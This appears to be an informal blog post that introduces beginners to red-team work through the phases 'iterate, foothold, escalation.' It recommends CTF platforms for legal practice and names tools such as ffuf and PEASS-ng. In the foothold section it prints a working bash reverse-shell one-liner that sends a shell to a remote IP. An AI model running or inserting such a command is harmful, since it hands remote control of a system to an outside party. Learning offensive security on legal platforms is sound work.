In computer science "security" is more of a vibe than a reality. There aren't any metrics or mechanisms by which you can prove (i.e. QED) whether or not state is secure or insecure. It's just state. Computers will always do what is asked of them. When you're on a Red Team, you're just like a lawyer looking at a contract, looking for a clause you can inadvertently leverage to your advantage. Getting into Red Team activities is a lot more approachable than you'd think! If you want a fun place to learn things, check out hackthebox, or other CTF platforms (places you can legally break into things to test your skills). I just want to impart some basic things that might get somebody excited.
There is a phrase in the Red Team community: "
Iterate, Foothold, Escalation".
Iteration is the probing phase. You might have heard the term "fuzzing", that's a form of iteration. It could be targeted, or brute force. essentially you are "looking for a crack". On the web, a really simple version of this would be something called "directory traversal" which really just means looking for files on a web server that aren't visible, but aren't protected either.
ffuf is a tool that does that, here is what it looks like in action:
Foothold is when you find a crack, and you manage to use that crack to get yourself "in the door." Most of the time we can't get the machine to let us in, but we can convince it to connect to us. This is called a reverse shell, and it can take many forms. These can get really complex, but there are still tools to make them approachable! A good one is
revshells here is a dead simple one only that still works in the wild all the time:
Bash:
sh -i >& /dev/tcp/10.10.10.10/9001 0>&1
that is all it takes to send a shell to the 10.10.10.10 IP so it has access.
Escalation is the last step. Most servers have some concept of a super user, admin, root, whatever. Becoming that user on a host is the end of the journey. Once you find an attack surface to escalate yourself through, you own that box. A popular suite of tools that look for common privilege escalations is called
PEASS-ng. There are flavors of it for Linux, Windows, MacOS. Most people will use it in conjunction with something out of
hacktricks.
Most of this stuff would be considered "script kiddy", it doesn't take much knowledge to do any of this. However, you open yourself up to oppportunities to learn about things that push you to think outside of the box. At some point you'll find yourself tampering with compiled code in Ghidra, or writing shell code for some "return oriented programming".
